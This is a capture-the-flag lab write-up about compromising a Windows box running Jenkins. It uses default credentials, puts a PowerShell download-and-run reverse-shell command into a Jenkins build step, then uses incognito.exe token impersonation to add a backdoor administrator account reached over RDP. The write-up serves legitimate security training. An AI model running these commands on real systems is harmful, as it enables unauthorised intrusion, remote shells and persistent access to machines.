#tryhackme #windows #easy ![[Pasted image 20250710202706.png]] --- # Information Gathering - Nmap As always I began with nmap to scan all TCP ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:41 CDT Nmap scan report for 10.10.212.94 Host is up (0.14s latency). Not shown: 65532 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 80/tcp open http 3389/tcp open ms-wbt-server 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds ``` Then I ran a more detailed scan against the found ports: 80, 3389, and 8080. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sCV -Pn $IP -p 80,3389,8080 Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT Nmap scan report for 10.10.212.94 Host is up. PORT STATE SERVICE VERSION 80/tcp filtered http 3389/tcp filtered ms-wbt-server 8080/tcp filtered http-proxy Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds ``` Lastly, a UDP scan against top 10 ports ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nmap -sU $IP --top-ports 10 -Pn Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT Nmap scan report for 10.10.212.94 Host is up. PORT STATE SERVICE 53/udp open|filtered domain 67/udp open|filtered dhcps 123/udp open|filtered ntp 135/udp open|filtered msrpc 137/udp open|filtered netbios-ns 138/udp open|filtered netbios-dgm 161/udp open|filtered snmp 445/udp open|filtered microsoft-ds 631/udp open|filtered ipp 1434/udp open|filtered ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds ``` # Footprinting ##### Port 80 This is the landing page. The source page didn't reveal anything interesting. ![[Pasted image 20250709214553.png]] ##### Port 8080 The landing page has a login form. We can clearly see that Jenkins is used here. ![[Pasted image 20250709215449.png]] # Exploit - Initial Access In the login form, I tried the default credentials `admin:admin` and they got me logged in! Now let's discover attack vectors to gain initial access. ![[Pasted image 20250709215914.png]] I have found a feature that allows us to execute commands on the underlying system. To navigate there, go to `project`. ![[Pasted image 20250709234030.png]] Now navigate to `Configure` ![[Pasted image 20250709234230.png]] In the `Build` section, there's a space we can insert our Windows commands to be executed. For our purpose, I'm going to use the following payload to get a reverse shell: ```powershell powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT> ``` ![[Pasted image 20250709234908.png]] In order to use the payload above, I need to first download `nishang`'s `Invoke-PowerShellTcp.ps1` reverse shell script from [here](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) The upper pane is for the Jenkins server to download `Invoke-PowerShellTcp.ps1` from my local Kali. The bottom pane is listener for receiving the reverse shell connection. ![[Pasted image 20250710000041.png]] Insert our payload and select `Apply` then `Save` at the bottom. ![[Pasted image 20250710000236.png]] Then it automatically redirects us to the `Project` page, select `Build Now` to execute our new build. ![[Pasted image 20250710000342.png]] Under `Build History`, you can see our newly created build is being prepared. ![[Pasted image 20250710000622.png]] Navigate back to the terminal, we can see that we got the reverse shell! ![[Pasted image 20250710000650.png]] Found `user.txt` flag ```powershell PS C:\Users\bruce\Desktop> dir Directory: C:\Users\bruce\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 10/25/2019 11:22 PM 32 user.txt PS C:\Users\bruce\Desktop> type user.txt 790... ``` # Privilege Escalation The `whoami /priv` command displays the privileges that are granted to the user `bruce` and those that are not. We can see `SeDebugPrivilege`, `SeChangeNotifyPrivilege`, `SeImpersonatePrivilege`, and `SeCreateGlobalPrivilege` are enabled for bruce. ![[Pasted image 20250710002017.png]] **For some reason my TryHackMe openvpn kept disconnecting to a point where I couldn't progress any further. Therefore, I am starting over with TryHackMe's built in VM. You can notice the different UI in the screenshots.** `SeImpersonatePrivilege` allows a user or process to impersonate other users, including privileged ones like `SYSTEM`. This means the process can act as another user using their security token. I am going to use `incognito.exe` tool to take advantage of this and exploit the system for privilege escalation. I am using the standalone version not the `meterpreter` one. I transferred `incognito.exe` from local environment to remote Windows system. ![[Pasted image 20250710195427.png]] `./incognito.exe list_tokens -u` command is used to enumerate the tokens. We see that under the `Delegation Tokens Available` section, `NT AUTHORITY\SYSTEM` is listed meaning we can impersonate as `SYSTEM`, the highest privilege on Windows. ```powershell PS C:\Temp> ./incognito.exe list_tokens -u [-] WARNING: Not running as SYSTEM. Not all tokens will be available. [*] Enumerating tokens [*] Listing unique users found Delegation Tokens Available ============================================ alfred\bruce IIS APPPOOL\DefaultAppPool NT AUTHORITY\IUSR NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Impersonation Tokens Available ============================================ NT AUTHORITY\ANONYMOUS LOGON Administrative Privileges Available ============================================ SeAssignPrimaryTokenPrivilege SeCreateTokenPrivilege SeTcbPrivilege SeTakeOwnershipPrivilege SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeImpersonatePrivilege SeRelabelPrivilege SeLoadDriverPrivilege ``` Remember, we found port `3389` open running an RDP service. We can create a user, add the user to the administrator group, and connect to the service via RDP. ```powershell PS C:\Temp> ./incognito.exe add_user wook wook413 [-] WARNING: Not running as SYSTEM. Not all tokens will be available. [*] Enumerating tokens [*] Attempting to add user wook to host 127.0.0.1 [+] Successfully added user PS C:\Temp> ./incognito.exe add_localgroup_user Administrators wook [-] WARNING: Not running as SYSTEM. Not all tokens will be available. [*] Enumerating tokens [*] Attempting to add user wook to local group Administrators on host 127.0.0.1 [+] Successfully added user to local group ``` After creating a user and adding the user to the administrator group, run `xfreerdp` to connect to the server as the credentials we just created, for our case `wook:wook413`. ```bash xfreerdp /v:10.10.41.223 /u:wook /p:wook413 /dynamic-resolution ``` `whoami` returns `alfred\wook` and `net localgroup` command reveals that we are part of the `Administrators` group as we expected. ![[Pasted image 20250710201903.png]] Found `root.txt` flag! ![[Pasted image 20250710202638.png]]